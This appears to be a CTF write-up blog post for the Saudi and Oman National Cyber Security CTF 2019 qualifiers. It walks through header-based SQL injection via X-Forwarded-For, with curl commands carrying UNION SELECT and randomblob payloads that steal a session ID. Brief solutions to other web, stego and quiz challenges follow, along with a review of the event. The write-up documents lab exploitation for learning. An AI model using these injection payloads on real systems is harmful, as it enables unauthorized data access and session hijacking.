Information#
CTF#
- Name : Saudi and Oman National Cyber Security CTF 2019 Quals
- Website : cybertalents.com
- Type : Online
- Format : Jeopardy
- CTF Time : link
200 - Maria - Web#
Maria is the only person who can view the flag
If you access the page with a valid cookie, you won't see anything, eg. curl -v http://35.222.174.178/maria/ -H 'Cookie: PHPSESSID=4l1vrp9q0tvgbjua7ddp9g2jh1;'.
But if you request the page without a cookie, you'll get an interesting result before the HTML content (I edited my IP address).
1 | $ curl http://35.222.174.178/maria/ |
Let's try to spoof our IP address:
1 | $ curl -v http://35.222.174.178/maria/ -H 'X-Forwarded-For: 127.0.0.1' |
The fake IP address is reflected, so we are able to control the output through the X-Forwarded-For HTTP header.
Let's find the number of columns with an Error-based SQLi:
1 | $ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT 1-- -" | head -1 |
Now we know that the nxf8_sessions has 4 columns.
Let's find if we can make a time based injection.
1 | $ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' OR SLEEP(5)-- -" | head -1 |
SLEEP seems to be unavailable, it is maybe MySQL < 5.
1 | $ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' OR BENCHMARK(100000000, rand())-- -" | head -1 |
No BENCHMARK either, so it can't be MySQL so.
1 | $ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' OR randomblob(100000000)-- -" | head -1 |
randomblob tells us it is a SQLite database, and the delay tells us it worked so we will be able to make a time based exploitation.
Let's guess another table than nxf8_sessions using the same naming:
1 | $ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT * FROM nxf8_persons-- -" | head -1 |
So there is a nxf8_users table with a different number of column than nxf8_sessions.
Let's guess some probable column names:
1 | $ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT name,password,1,1 FROM nxf8_users where name='maria'-- -" | head -1 |
So far I found those tables and columns:
- nxf8_sessions
- id
- user_id
- ip_address
- session_id
- nxf8_users
- id
- name
- password
- role
- more unidentified columns
Now we found the right table and columns, let's think about the payload we will need: X-Forwarded-For: 127.0.0.1' UNION SELECT session_id,1,1,1 FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- - to get the following query executed by the server: SELECT * FROM nxf8_sessions where ip_address = '127.0.0.1' UNION SELECT session_id,1,1,1 FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- -';
Let's execute that:
1 | $ curl --head http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT 1,1,session_id,1 FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- -" |
We can see there is two times Set-Cookie: PHPSESSID, and the second is PHPSESSID=1;.
As we sent a SELECT 1 it must be the result of our query, we are selecting 4 columns but only one is reflected here, so let's change the order in the SELECT clause.
Finally we found that the 4th column is injected in the PHPSESSID value, so we will need to send 1,1,1,session_id.
1 | $ curl --head http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT 1,1,1,session_id FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- -" |
But this way we are send two cookie with the same key PHPSESSID so only the first one is being used by the server and we are not seeing anything.
Let's just make a normal request without injection and only the right cookie:
1 | $ curl http://35.222.174.178/maria/ -H 'Cookie: PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968' |
Now we have the Hello Maria : your secret flag is : aj9dhAdf4.
50 - Back to basics - Web#
not pretty much many options. No need to open a link from a browser, there is always a different way
http://35.197.254.240/backtobasics redirects to (HTTP 302) http://35.197.254.240/backtobasics/, then we can see there are 4 authorized HTTP verbs: GET, POST, HEAD,OPTIONS.
There is also document.location = "http://www.google.com"; making a javascript redirect to google website.
1 | $ curl -v http://35.197.254.240/backtobasics/ |
Let's try another method like POST:
1 | $ curl -X POST http://35.197.254.240/backtobasics/ |
We got an HTML comment embedding obfuscated JavaScript code.
1 | var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"]; |
Let's deobfuscate it and correct it manually.
1 | var reversed_flag = "ceab068d9522dc567177de8009f323b2"; |
By executing the above code in our browser console we got 2b323f9008ed771765cd2259d860baec.
50 - I love images - Stego#
A hacker left us something that allows us to track him in this image, can you find it?
One-liner:
1 | $ strings godot.png | tail -1 | base32 -d |
50 - Just Another Conference - Quiz#
famous Cybersecurity conference runs by OWASP in different locations
AppSec
Experience feedback#
Pros:
- Stable platform
- Fair duration
Cons:
- No team, only individual
- Few challenges: 9
- Unrealistic challenges
- Some challenges are unrelated to security: the stego challenges are not about true steganography but just fun/joy useless challenge requiring guessing
- Bad categorization: most forensics challenges were in fact some stego challenges
- Too much personal information is required for the registration like phone number, sex, the university you were, real name, etc. where only a pseudo and a email address are required.
Conclusion: Challenges are quite easy and targeting high school student who have some notions about security. But the challenges quality are rather low and if you already have the basics you won't learn anything useful in real life because challenge are all unrealistic. However for student you can still learn the basics or tricks that only exists in CTF.